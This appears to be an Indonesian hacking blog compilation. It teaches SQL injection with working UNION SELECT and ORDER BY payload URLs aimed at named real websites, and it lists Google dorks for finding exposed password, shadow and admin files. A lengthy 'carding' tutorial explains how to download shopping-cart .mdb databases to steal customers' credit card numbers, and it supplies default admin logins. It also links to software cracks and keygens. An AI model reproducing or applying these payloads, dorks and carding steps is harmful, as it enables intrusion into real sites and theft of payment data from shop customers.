ada banyak website yang mempunyai lubang pada injection tapi ada juga berlubang tapi udah terlindungi
seperti ketika kita masukkan code
www.target.com/celah.php?id=1' ketika kita masukkan code ' maka muncul error
atau ketika kita tes dengan code lainnya muncul error namun
www.target.com/celah.php?id=1+And+1=2+union+select+ ketika kita memasukkan kode +And+1=2+union+select+ maka yang terjadi malah website muncul error yang lain (bukan error sql)hal itu disebabkan karena website sudah di filter dengen perintah- perintah sql dan sejenisnya.
filter ini bekerja terhadap kata seperti union,select, all dsb.
dalam hal ini kita bisa menyiasati hal ini yaitu dengan merubah perintah huruf-huruf pada perintah sql mnjadi www.target.com/celah.php?id=+aNd+1=2+uNiOn+SeLect+
ini juga berlaku pada perintah2 yang lain seperti xss,lfi, dsb.
nb:tidak semua situs bisa disiasati dengan ini
selamat mencoba
rapidshare adalah layanan hosting terkenal pasti semua udah tau!!
tapi ada cara lain agar kita bisa download cepat kayak premium alias rapid lech
untuk situsnya silakan klik link di bawah ini!!
eits lupa g cuma rs tapi yang lain juga !! ada banyak
Lanjutkan..
da banyak dork yang ku gunakan dalam injecting beberapa diantaranya aku coba sharing disini
silakan dipakai sebaik-baiknya trus klo ada yg baru silakan shar disini!! kita juga bisa mengeditnya dari apa yang udah ada disini
seperti
allinurl:php/player_id=
allinurl:php/gid=
tapi diatas udah terlalu dasar jadi ku coba edit kayak gini
daterange:2454480-2454969 inurl:php/gid= inurl:co.uk
co.uk == artinya kita hanya nyari di situs yang berdomain do co.uk dari situ bis kita kembangin mulai dari domain com.au(australia) fr(france) id(indonesia) ca(canada) dan lain sebagainya sehingga kita dapat memperkecil jangkauan pencarian!!
atau bisa juga seperti ini
daterange:2454480-2454969 inurl:php/gid= inurl:co.uk intext:cart
cart=== artinya kita hanya mencari yang di situsnya terdapat tulisan cartnya
biasanya ku gnti terserah buat nyari yang ada ccnya(hehe)
atau ada juga
daterange:2454480-2454969 inurl:php/gid= inurl:co.uk intext:cart intitle:view
view===buat nyari yang nunjukin barangnya(menandakan shop)
lumayan kan dari 1 dork(inurl:php/gid=) bisa dimodifikasi kayak gitu klo banyak dork gmn??
untuk yang dork lain silakan di modif sendiri
dibawah ini ada beberapa dork lainnya
inurl:php/cid=
inurl:php/lid=
inurl:
products.php?subcat_id=
product.php?product_id=
product.php?prod_id=
product.php?cat_id=
dan lain ssebagainya
cukup disitu aja deh untuk dork yang lain lain kali aja atau call me cz itu aja udah ada ribuan klo kita edit kyk yg q jelasin tadi q aja habisin dork itu 1 dork sekitar 1 hari untuk 1 domain klo ada banyak? tenang dork diatas belum prnah kucoba sama sekali koq!! kecuali buat contoh tadi tapi hanya sebagian!!! ku juga situs bank dari dork ini loh!!
ada tool yang kudapat dari forum di internet silakan klo pengen cba tapi ingat langsungan tetep yang terbaik dari tool (aku sendiri jarang pake tool gtuan)
coba down di sini
ni ada juga situs yang ada celahnya yang kudapat dari dork itu
http://www.credimed.org.br/show.php?gid=449+AND+1=2+UNION+SELECT+0,[t],2,3,4,5,6,7,8,9,[t],[t]
cba pake tool yang yang ada di blog ini (situs ini ga ada encryptnya jadi mudah di inject)
ada banyak link bagus di internet tapi dibawah ini situs yang tidak begitu terkenal tapi cukup menarik untuk dibuka
cracksearchengine
link ini berisi kumpulan crack, keygen serta sn dari kumpulan berbagai macam software/ aplikasi komputer. bagi yang kesulitan mencari cracknya (biar menjadi full) silakan coba link tersebut
blackle
mesin pencari seperti google atau aslinya memang google yang telah di modifikasi sehingga memungkinkan kita mencari sesuatu tanpa batasan yang terdapat di google
kavkiskey
berisi kumpulan key antivirus kaspersky sehingga kita tidak perlu susah- susah mencari keynya kesana kemari kesitu n kesono
darkc0de
forum hacker,cracker serta yang lainnya. bagi yang pengen belajar hacker silakan kunjungi situs ini. namun entah kenapa situs ini lagi trouble.
yogyafree
situs forum untuk belajar berbagai macam ilmu komputer mulai dari cracking, hacking,web desainer serta progamming lainnya. silakan kunjungi untuk mencari tahu lebih dalam
milw0rm
didalamnya terdapat berbagai macam artikel yang menarik untuk dipelajari serta berbagai acam script yang menarik untuk dipakai. silakan dicoba
cukup sekian yang lainnya dilanjutklan lain kali aja
kemarin habis begadang eh gak taunya dapat kode injection
coba gunakan dork dibawah ini
inurl:"propertyDetails.php?pid="
jika kita teliti semua website yang di inject pasti kolomnya ada 118 atau tambahin aja url dibelakangnya dengan ini
"+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118"
jadi hasilnya "www.situsnya.com/propertyDetails.php?pid=25+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118"
biasanya celah ada di kolom 8 dan belakang- belakang gak tau berapa(lupa)
dan isinya
Database: propertywebsite2
User: pwo@webhost0.buswebservers.co.uk
Version: 5.0.32-Debian_7etch8-log
selamat mencoba(masih banyak web yang belum kebuka jdi jangan kuatir g ada isinya)
good luck
Rapidshare
Ini adalah sebuah tempat orang -orang menitipkan barangnya. namun masih banyak orang- orang yang kesulitan untuk mendownload filenya!
hal ini disebabkan adanya batasan bagi free user!! namun kita juga bisa mencari alternatif lain yang sama halnya di premium member dibawah ini silakan klik link dibawah untuk mendapatkan fasilitas seperti premium member dirapidshare!
cukup copas link rs ke dalamnya
klik di sini
atau copas link ini "http://www.rapid-x.co.uk/"
Ada Banyak macam tool-tool yang digunakan salah satunya yang sering ku pakai yaitu Msqli Dumper! tool ini sangat berguna untuk inject! lihat screen shotnya dibawah
untuk mendownloadnya silakan klik di sini!
berikut ini google dork lain yang jarang ditemuin
silakan dicoba yang saya temukan di situs lain
ext:
Mencari tipe file tertentu. misalkan 'ext:gz.'
related:
mencari website dengan tema-tema serupa
misalkan 'related:okezone.com'
site:
menampilkan sub-site. misalkan 'site:yogyafree.net', Mbah google akan menampilkan semua sub-site dibawah http://www.yogyafree..net
allinurl:
Memperhatikan istilah pencarian dalam URL.
misalkan 'allinurl:commandline' kamu akan menadpatkan website yang menggunakan kata "commandline" didalamnya.
allintittle:
Mencari istilah dalam baris judul. Dengan perintah ini kamu akan mencari dalam baris-baris judul website, misalkan 'allintitle:republika.co.id'
define:
Pencarian dengan menampilkkan penjelasan istilah. kamu mau tahu tentang "cybercrime", dengan mengetikkan 'define:cybercrime' maka anda akan mendapatkan sejumlah website yang menjelaskan istilah itu secara gamblang.
link:
Memeriksa Popularitas Website. Semakin menarik Website, semakin banyak link situs kesana. mau tahu seberapa banyak link dari situs lainnya di Homepage pribadi kamu 'link:namahomepage'
filetype:torrent
Menemukan file-file torrent. Mbah google ga suka ini, makanya berusaha dihalangin. tapi dengan mengetikkan nama file sebelum perintah ini, pencarian file bitTorrent masih bisa dilakukan.
misalkan 'cryptography filetype:torrent'
movie:
menampilkan info film. bagi kamu-kamu yang ngerti "bhoso londo"--Inggris, bisa dapat review blocbuster actual
contoh 'movie:i am legends'
daterange:
Menemukan website yang baru di index. Mbah google akan menampilkan website yang diindeks dalam waktu tertentu.
masukkan dalam format tanggal USA misalkan 'daterange:(2008-01-06)(2006-01-31)'
dibawah ini ada bermacam- macam dork yang digunakan pada google untuk mencari password!! silakan di coba
filetype:htpasswd htpasswd
intitle:"Index of .htpasswd -intitle:"dist -apache -htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurl:passlist.txt (para encontrar listas de passwords)
intitle:"Index of..etc passwd
intitle:admin intitle:login
Incorrect syntax near (SQL script error)
intitle:"the page cannot be found inetmgr (debilidad en IIS4)
intitle:index.of ws_ftp.ini
Supplied arguments is not a valid PostgreSQL result (possible debilidad SQL)
_vti_pvt password intitle:index.of (Frontpage)
inurl:backup intitle:index.of inurl:admin
Index of /backup
index.of.password
index.of.winnt
inurl:"auth_user_file.txt
Index of /admin
Index of /password
Index of /mail
Index of / +passwd
Index of / +.htaccess
Index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: index of/admin
allintitle: index of/root
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt
inurl:"wwwroot/*.
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of .sh_history
intitle:"Index of .bash_history
intitle:"Index of passwd
intitle:"Index of people.1st
intitle:"Index of pwd.db
intitle:"Index of etc/shadow
intitle:"Index of spwd
intitle:"Index of master.passwd
intitle:"Index of htpasswd
intitle:"Index of members OR accounts
intitle:"Index of user_carts OR user _cart
tamabahan yang lainnya(copas dari web lain)
filetype:htpasswd htpasswd intitle:"Index of” “.htpasswd” -intitle:"dist” -apache -htpasswd.c index.of.private (algo privado) intitle:index.of master.passwd inurlasslist.txt (para encontrar listas de passwords) intitle:"Index of..etc” passwd intitle:admin intitle:login “Incorrect syntax near” (SQL script error) intitle:"the page cannot be found” inetmgr (debilidad en IIS4) intitle:index.of ws_ftp.ini “Supplied arguments is not a valid PostgreSQL result” (possible debilidad SQL) _vti_pvt password intitle:index.of (Frontpage) inurl:backup intitle:index.of inurl:admin “Index of /backup” index.of.password index.of.winnt inurl:"auth_user_file.txt” “Index of /admin” “Index of /password” “Index of /mail” “Index of /” +passwd Index of /” +.htaccess Index of ftp +.mdb allinurl:/cgi-bin/ +mailto allintitle: “index of/admin” allintitle: “index of/root” allintitle: sensitive filetypeoc allintitle: restricted filetype :mail allintitle: restricted filetypeBig Grinoc site:gov administrator.pwd.index authors.pwd.index service.pwd.index filetype:config web gobal.asax index inurltongue :passwd filetype:txt inurl:admin filetypeb inurl:iisadmin inurl:"auth_user_file.txt” inurl:"wwwroot/*.” allinurl: winnt/system32/ (get cmd.exe) allinurl:/bash_history intitle:"Index of” .sh_history intitle:"Index of” .bash_history intitle:"Index of” passwd intitle:"Index of” people.1st intitle:"Index of” pwd.db intitle:"Index of” etc/shadow intitle:"Index of” spwd intitle:"Index of” master.passwd intitle:"Index of” htpasswd intitle:"Index of” members OR accounts intitle:"Index of” user_carts OR user _cart.
Google is our friend
itulah sebutan para hacker n cracker di dalam internet
ini merupakan hal dasar yangh harus diketahui di dunia internet
ada banyak kata kunci yang dimiliki mesin pencari ini yang disebut dork atau google dork
dibawah ini ada beberapa contoh google dork yang sering digunakan
intext:aa ---- digunakan untuk mencari web yang mengandung kata aa
inurl:php/id= ----- digunakan untuk mencari web yg alamatnya mengandung ....php/id= (paling sering digunakan para hacker)
allinurl: ----mirip dengan sebelumnya
intitle:cc ----- digunakan untuk mencari website dengan judul cc
sebenarnya ada banyak dork yang lainnya n kita bahas lain kali aja ya
namun untuk istilah hack atau untuk mencari web yang mengandung celah di dalamnya biasanya mesin google membatasi pencarian sehingga untuk web pada halaman 10 ke atas udah di blok untuk hal itu kita bisa mencari jalan lain pengganti google
www.blackle.com (mungkin ini merupakan google yang telah di modif)
http://www.google.com/cse?cx=009758108896363993364:wnzqtk1afdo (ini juga google yang telah di modif oleh darkc0de)
http://www.molotovbitch.org/search/ (merupakan mesin pencari yang dibuat seperti google )
cukup itu aja yang bisa saya post sekarang selanjutnya diteruskan lain kali aja
Mendeteksi SQL Injection Vulnerability
[x] Apa itu SQL injection?SQL injection adalah teknik eksploitasi database via remote.
dengan menggunakan SQL Query [perintah2 SQL] kita bisa mengetahui isi dari database target.
lebih lanjut bisa dibaca disini http://en.wikipedia.org/wiki/SQL_injection
cape ngejelasin ne.. panjang amit. :)
[x] Bagaimana cara mendeteksi SQL Injection pada sebuah site?
ada banyak cara untuk mendeteksi SQL Injection pada sebuah site.
salah satunya adalah dengan menggunakan command AND 1=1 dan AND 1=2
AND 1=1 <=- keadaan TRUE
AND 1=2 <=- keadaan FALSE
masih banyak cara2 yang lain untuk mendeteksi SQL Injection, dalam tutor ini gw hanya menggunakan cara ini.
langsung contoh target ajah ya...
googling dengan keyword "product_details.php?product_id="
nah pasti bakal keluar target2nya kan? kita ambil contoh target berikut.
http://www.ntlabs.co.uk/product_details.php?product_id=17
sekarang kita akan mencoba mendeteksi SQL Injection pada target diatas dengan menggunakan command2 tadi.
[1] http://www.ntlabs.co.uk/product_details.php?product_id=17 AND 1=1
[2] http://www.ntlabs.co.uk/product_details.php?product_id=17 AND 1=2
apa perbedaan antara URL pertama dan URL kedua?
dalam kondisi AND 1=1 [TRUE] halaman sitenya tidak akan mengalami perubahan sedangkan
dalam kondisi AND 1=2 [FALSE] halaman sitenya pasti akan berubah, baik itu ada pesan error ataupun tidak.
ini berarti site tersebut bisa kita eksploitasi dengan menggunakan SQL Injection.
[x] Bagaimana mencari jumlah TABLE dalam database?
ada banyak cara juga dalam mencari jumlah TABLE dalam database target, dalam tutor ini gw make command ORDER BY.
angka dibelakang comamand ORDER BY adalah jumlah TABLE, kita mulai dengan angka 1.
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 1/*
setelah dirun ternyata halamannya tidak ada perubahan atau halamannya masih dalam kondisi TRUE, itu berarti TABLE lebih dari 1.
langsung ke angka 10 ajah biar cepet. :)
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 10/*
apa yang terjadi? ternyata halamannya berubah atau halaman sudah dalam kondisi FALSE, berarti TABLE tidak lebih dari 10.
jadi range TABLE dalam databasenya adalah dari 1 - 10.
sekarang kita turunin angkanya jadi 9.
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 9/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 8/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 7/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 6/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 5/*
ternyata masih FALSE juga, so kita turunin lagi angkanya sampai dapat kondisi TRUE
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 4/*
ternyata pada angka 4 halaman kembali pada kondisi TRUE. jadi bisa kita simpulkan bahwa ada 4 TABLE didalam database target.
koq bisa tau ada 4 TABLE sih? karena pada angka 4 kondisi halaman TRUE sedangkan pada angka 5 kondisi halaman sudah FALSE.
ga percaya? kita buktikan dengan menggunakan command UNION SELECT.
[1] http://www.ntlabs.co.uk/product_details.php?product_id=17 UNION SELECT 1,2,3,4/*
[2] http://www.ntlabs.co.uk/product_details.php?product_id=17 UNION SELECT 1,2,3,4,5/*
lagi2 kondisi TRUE pada URL pertama dan kondisi FALSE pada URL kedua.
benarkan? :p
[x] Magic number? [what the f*ck]
apa itu magic number?
magic number adalah angka2 yang akan keluar pada halaman site, angka2 ini akan dipakai untuk memasukkan SQL Query [perintah2 SQL]
bagaimana cara mengeluarkan magic numbernya?
caranya yaitu dengan menambahkan tanda - didepan angka setelah variabel. dalam tutor ini yaitu angka 17. [product_details.php?product_id=-17]
http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,2,3,4/*
angka2 berapa ajah yang keluar pada halaman site?
yup ada angka 2, 3 dan 4. jadi angka2 ini yang akan kita pakai untuk memasukkan SQL Query [perintah2 SQL].
misalnya untuk melihat versi dari database kita dapat menggunakan perintah version().
[1] http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,2,version(),4/*
[2] http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,database(),version(),user()/*
jadi magic number yang udah dikeluarin tadi diganti dengan perintah2 SQL. ngerti ora? xixixi...
kurang lebih seperti itu cara untuk mendeteksi SQL Injection Vulnerability pada sebuah site atau source.
any question? post comment atau googling ajah yak!! :)
Referensi
google.com
wikipedia.org
dll
Lanjutkan..
Carding-in database memiliki dua makna.
Yang pertama adalah "Cardingin Database".
Sedangkan yang kedua bisa berarti "Carding in (dalam) database".
Mulai saat ini dan seterusnya, Anda akan menemukan teknik carding yang ternyata bisa dilakukan dengan begitu sederhana. Anda tidak perlu mengerti proses enkripsi mencuri password terlebih dahulu untuk bisa masuk ke sebuah situs. Dalam bab ini Anda akan mempelajari beberapa teknik yang langsung mengakses database.
Berikut ini saya berikan sebuah teknik yang bisa digunakan untuk proses carding. Anda tidak memerlukan tools, untuk melakukan hal ini. Hanya bermodalkan sebuah browser, dan membuka situs Google.
Vsproducts.mdb
Sebenarnya kalau boleh dibilang teknik ini sudah lama dan kuno. Tapi, sampai saat ini masih banyak yang bisa dicardingin. Semua itu tergantung dari kreativitas Anda.
File database yang akan dicolong adalah vsproducts.md. File ini merupakan bawaan template shopping cart ASP yang diterapkan pada sistem Microsoft Frontpage. Bagi Anda yang beruntung juga bisa menemukan nomor kartu kredit yang tidak dienkripsi. Sebab enkripsi itu sendiri bersifat optional, jadi tidak bawaan langsung, sehingga bisa langsung tampil.
Kode untuk menghubungkan database dengan file database yang digunakan adalah sebagai berikut:
sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=<%=server.mappath("vsproducts.mdb")%>;"
Sebenarnya, situs yang menerapkan model seperti ini, memiliki file test (percobaan):
http://www.situs-target.com/fpdb/test.asp
Saya harap dari penjelasan ini, pikiran negatif Anda sudah bisa bangun. Jadi, apabila Anda tidak menemukan file vsproducts.mdb langsung dari hasil searching namun menemukan link seperti di atas, patut Anda curigai. Sebab kemungkinan besar mengandung file vsproducts.mdb.
Biasanya, pesan yang muncul saat melakukan test tersebut adalah:
sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=C:\web\database\vsproducts.mdb;"
Apabila file yang Anda jalankan adalah:
db_con_open.asp maka pesan yang muncul adalah:
<% DIM sDSN sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=C:\web\database\vsproducts.mdb;" %>
Cukup sedikit saja teorinya, kita segera saja membahas poin berikutnya. Pada bagian query Google Anda masukkan syntax:
allinurl:proddetail.asp?prod=
Sekarang Anda buka hasil searching Google tersebut, satu per satu.
Misalnya, nama situs target yang saya peroleh adalah
http://www.situs-target.com/store/proddetail.asp?prod=10001G
Saya ubah URL-nya menjadi:
http://www.situs-target.com/store/fpdb/vsproducts.mdb
Efek sampingnya adalah Anda bisa mendownload file database secara langsung Smile.
Dari kota dialog download tersebut klik tombol Save untuk menyimpan file database yang Anda dapatkan.
Dalam kotak dialog Save As simpan file tersebut dengan mengklik kembali tombol Save.
Tunggulah proses download dilakukan sampai selesai. Setelah selesai, klik tombol Open untuk membuka dengan aplikasi MS.Access.
Perhatikan pada hasil target yang Anda peroleh, tampak bahwa data kartu kredit ada pada tabel Orders. Tiap hasil yang Anda peroleh bisa berbeda antara situs yang satu dengan situs yang lain.
Selain itu, kita juga akan memperoleh nama administrator beserta passwordnya pada bagian Admin.
Nah, Anda sudah mendapatkan satu database pertama.
Sebagai tambahan untuk penjelasan bagian ini, saya harap Anda bisa mempermainkan folder atau directory yang terdapat di dalamnya. Masalah mempermainkan folder ini termasuk dalam bagian ilmu Google Hacking atau Google Dorks. Pada kesempatan ini cukup saya jelaskan sekilas saja.
Misalnya Anda mendapat target:
http://www.situs-target.com/store/proddetail.asp?prod=10001G
Ubah URL-nya menjadi:
http://www.situs-target.com/store/fpdb/vsproducts.mdb
http://www.situs-target.com/fpdb/vsproducts.mdb
http://www.situs-target.com/store/vsproducts.mdb
http://www.situs-target.com/vsproducts.mdb
Tujuannya adalah untuk menemukan dimana letak file database disembunyikan.
Proses kreatif lainnya yang perlu Anda pahami adalah mengira-ngira nama file yang mirip. Hal ini sengaja saya jelaskan pada bagian awal. Sebab, jika nanti-nanti Anda sedang mencoba beraksi ternyata tidak berhasil, maka Anda harus memahami bagian ini, karena saya tidak akan menjelaskan lagi pada bagian berikutnya.
Contohnya begini, saya ambil dari kasus di atas, nama file database-nya adalah: vsproducts.mdb. Kira-kira yang mirip adalah file vsproduct.mdb (tanpa huruf s). Atau mungkin saja vspproducts.mdb, vspproduct.mdb, pokoknya pintar-pintar Anda-lah.
Walaupun hal ini kelihatannya sepele, sebenarnya dari banyak kejadian yang saya temukan banyak yang berhasil. Hal ini terjadi karena untuk mengamankan sebuah sistem, sering nama file database disamarkan, dan biasanya pula namanya hampir mirip-mirip. Contoh lainnya, ada tulisan orders, ada juga order. Bahkan beberapa kasus bersifat case sensitive, jadi apabila Anda mengetikkan Credit Card akan dianggap berbeda dibanding mengetikkan credit card.
Itulah dua poin penting yang perlu Anda pahami, supaya hasil target Anda menjadi lebih banyak. Tentu saja semua itu butuh kesabaran dan kreativitas. Sebagai bonus dari saya untuk bagian ini, adalah berikut halaman loginnya:
http://www.situs-target.com/vsadmin/admin.asp
dengan account dan password default adalah mystore dan changeme.
Seandainya Anda tidak bisa masuk dengan password default, Anda tetap masih bisa masuk menggunakan account dan password dan file database yang Anda peroleh. Smile
Shopping.mdb
Salah satu file database yang paling terkenal adalah shopping.mdb. Nama file database ini yang dibuat menggunakan MS.Access, biasanya juga terhubung dengan ASP. Berikut adalah teknik untuk mendapatkan file database tersebut yang berisikan data customer.
Seperti biasa, gunakan Google untuk mencari targetnya. Langkah detilnya sudah saya jelaskan pada bagian mencari database yang pertama, jadi saya tidak akan mengulang-ulang lagi. Maka saya hanya akan menyebutkan syntax-nya saja untuk bagian berikutnya.
Syntax: inurl:shopping.mdb
Dari link hasil searching, saya hanya perlu mendownload file databasenya. Isinya bukan hanya data kartu kredit baik customer maupun orders. Ada juga password user dan administrator di dalamnya.
Proses download bisa berbeda pada tiap orang, terutama bila menggunakan aplikasi software internet download manager yang cukup beragam dalam mendownload file database.
Saya tidak mau berpanjanglebar menjelaskan masalah teknik dan nama file secara spesifik. Saya lebih tertarik untuk mengajarkan konsepnya. Sebab dengan cara seperti itu, Anda bisa mengembangkan sendiri teknik yang diperlukan. Mengapa hal ini saya tekankan, karena nama file database bisa saja berbeda-beda. Tergantung dari nama pembuat filenya dan juga demi alasan keamanan. Sebenarnya, jika Anda mau sedikit usaha, Anda bisa memodifikasi syntax: inurl:shopping.mdb , menjadi bentuk lainnya. Dalam hal ini, saya mencoba mengubahnya menjadi:
Shopping350.mdb, shopping400.mdb, dan shopping450.mdb.
Bahkan juga ada shopping.mdb, yang berupa nama file database adalah nama situs itu sendiri. Ternyata banyak juga hasil searching yang memuaskan untuk menjadi bahan latihan carding. Ini penting bagi calon ahli webmaster yang mungkin suatu saat berminat bekerja sebagai webmaster atau penjaga keamanan situs belanja di internet.
Eipc.mdb
File database eipc.mdb adalah file default dari ProductCart. Biasanya, file ini disimpan dalam direktori productcart/database/eipc.mdb. Ada juga dari file tersebut yang mengalami proteksi password. Untuk mencari situs yang memakai sistem database ini gunakan syntax berikut untuk mencarinya di google.com
Syntax: allinurl:productcart/database/EIPC.mdb
Expire.mdb
Kalau diterjemahkan secara kasar maka expire.mdb berarti tanggal berakhirnya sebuah kartu kredit. Walau sebenarnya maksudnya bukan itu, tapi nyatanya itu tetap berhubungan dengan carding. Bingung bukan?
Sebenarnya, ini adalah file default dari CatalogIntegrator Cart; yang merupakan aplikasi e-commerce yang dijual pertama kali oleh pihak Adobe System. Aplikasi ini lebih bersifat customer friendly, dan mudah digunakan sehingga cukup banyak pihak yang tertarik untuk menggunakannya.
Syntax: inurl:expire.mdb
Sebagai tambahan saja, pada kebanyakan kasus password default untuk admin yang menggunakan expire.mdb adalah demo, dengan nama account admin adalah: admin
Halaman loginnya:
http://www.situs-target.com/Catalog/Admin/admin.asp
Perhatikan dengan benar huruf besar kecilnya pada URL supaya tidak terjadi error.
Lokasi file expire.mdb itu sendiri bisa Anda perhatikan secara cermat.
Apalagi jika seseorang bisa masuk, maka dia akan dapat melihat berbagai order pembelian dan tentu saja nomor kartu kredit terdapat di dalamnya. Tapi, saya rasa dengan mendapatkan file database-nya saja sudah cukup kok.
Products.mdb
Sebenarnya ini adalah nama file database yang cukup umum digunakan. Oleh karena ini milik umum maka isinya bisa saja bermacam-macam. Ada yang menampilkan nama produk saja dalam database. Ada pula yang menampilkan daftar order termasuk nomor kartu kredit pada konsumen.
Namun, jangan ragu jangan takut, banyak juga kok yang berisikan data konsumen. Tapi ada pula beberapa yang tidak menyertai nomor kartu kredit.
Ha...ha...ha...apa Anda bingung bacanya. Makanya lebih enakan filenya Anda download sendiri yang banyak biar jelas.
Syntax: inurl:products.mdb
Billing.mdb
File database billing.mdb ini menyimpan data kartu kredit dalam tabel Payments. Supaya lebih enak, mendingan Anda buka semua tabel dari hasil download yang Anda dapatkan. Sebab data kartu kredit tidak hanya disimpan dalam tabel Credit Cards, Orders, dan Customers. Karena bisa saja dimanipulasi oleh pembuat database, misalnya nama tabel Time (waktu), tapi isinya malah nomor kartu kredit. Dan hal ini berlaku bagi semua file database dalam buku ini. Makanya jangan cepat menyerah, tetap semangat untuk memperoleh pengalaman dan pengetahuan baru mengenai network security ini.
Shop.mdb
Berikut adalah jenis database lainnya yang sering digunakan untuk aktivitas carding. Shop.mdb, jika diterjemahkan berarti database toko, tentu saja isinya bisa komplit termasuk kartu kredit customer.
Syntax: inurl:shop.mdb
Setiap file shop.mdb yang saya temukan selalu berupa form. Jika mau, Anda juga bisa membuka dalam bentuk tabel.
Exploitshop.mdb
Dalam kesempatan ini saya tidak akan banyak berbicara mengenai exploit. Mengapa hal ini saya batasi, sebab kebanyakan exploit adalah teknik kuno yang sudah basi sehingga tidak banyak digunakan lagi. Beberapa exploit yang saya bahas dalam artikel ini, tujuan sebenarnya hanyalah untuk memberikan cara lain sebagai bentuk variasi, paling tidak untuk memberikan wawasan dan pengetahuan baru bagi Anda, terutama para calon webmaster. Dan selain itu juga sekaligus untuk membuka mata Anda supaya tahu bahwa tidak semuanya bisa langsung dengan cara mendownload database maupun file log. Masih dengan nama database yang sama, yaitu shop.mdb. Hanya saja model syntax dan teknik yang dilakukan berbeda.
Syntax: inurl:mall/lobby.asp
Dari situs target yang Anda temukan saat searching di Google, bukalah URL yang ditampilkan oleh Google. Biasanya, nama URL-nya adalah:
http://www.situs-target.com/mall/lobby.asp
Yang harus Anda lakukan adalah mengubah string
mall/lobby.asp
menjadi
fpdb/shop.mdb
Sehingga secara lengkap akan menjadi:
http://www.situs-target.com/fpdb/shop.mdb
Selanjutnya, Anda tinggal mendownload file databasenya. Data mengenai kartu kredit tersimpan pada bagian Payments (pembayaran).
Store.mdb
File database store.mdb ini adalah nama lain dari shop, juga nama lain untuk products. Walau demikian, file store.mdb ini menyimpan cukup banyak nomor kartu kredit. Dan biasanya disimpan dalam tabel Carthead.
Syntax: inurl:store.mdb
Mystore.mdb
Setelah menggunakan syntax store.mdb, berikut ini adalah model lainnya, yaitu: mystore.mdb. File database mystore.mdb ini banyak digunakan pada aplikasi shopping cart FPcartPal. Sistem ini menangani kartu kredit yang lebih aman. Sebab mereka menggunakan PayPal. Paypal adalah salah satu alat pembayaran elektronik di internet.
Syntax: inurl:mystore.mdb
Jujur saja, database ini tidaklah berisi nomor kartu kredit, sebab saya hanya ingin menunjukkan pada Anda bagaimana memodifikasi sebuah syntax. Dalam hal ini, dari store.mdb menjadi mystore.mdb. Sebenarnya, berhubungan dengan file mystore.mdb pada sistem yang sama terdapat sebuah file laporan yaitu reports.mdb. Isinya adalah laporang tentang transaksi, nggak ada kartu kreditnya. Tapi para carder biasanya memanfaatkan untuk hal lainnya. Sebab siapa tahu saja, barangkali ada file database reports.mdb yang menyimpan data kartu kredit karena bukan bagian dari produk FpcartPal, begitu pula untuk mystore.mdb.
Order.mdb
Saya rasa Anda sudah mengenal dengan jelas order.mdb yang berarti file database pemesanan. Berarti setiap pesanan akan disimpan dalam database yang satu ini. Tentu saja untuk berbelanja salah satu sarananya adalah untuk menggunakan kartu kredit.
Syntax: inurl:order.mdb
Cart.mdb
Ini dia kata-kata yang sering digunakan dalam online shop. Semua barang belanjaan di internet akan dimasukkan ke dalam cart (keranjang). Nah, seseorang bisa saja memanfaatkannya untuk melakukan aktivitas carding.
Syntax: inurl:cart.mdb
Kemungkinan lain dari database ini yang telah dimodifikasi. Misalnya, shoppingcart.mdb, shopping_cart.mdb, cart.mdb, clickcart.mdb, dan berbagai bentuk lainnya. Sesuai dengan kesukaan sang pemilik situs. Trik ini digunakan untuk mengelabui para carder supaya tidak bisa mendapatkan file mdb dengan mudah.
Scart.mdb
Serupa tapi tak sama. Itulah yang bisa saya jelaskan mengenai database scart.mdb. Ada dua model syntax yang bisa Anda coba gunakan.
allinurl:admin/scart.mdb
atau
inurl:scart.mdb
Sebenarnya model syntax ini bisa Anda modifikasi sendiri, termasuk juga untuk syntax-syntax lainnya yang terdapat dalam artikel ini. Kreatiflah mengubah syntax seperti kasus store menjadi mystore. Kalau Anda mau lebih jelas, Anda harus banyak belajar mengenai berbagai syntax google hacking (google dorks).
ExploitScart.mdb
Untuk nama database yang sama, yaitu scart.mdb, akan saya berikan sebuah exploit. Langsung saja, dengan menggunakan syntax untuk Google:
inurl:shopKart20
Bisa juga dimodifikasi menjadi "/shopKart20/"
(tanda kutip duanya tetap digunakan)
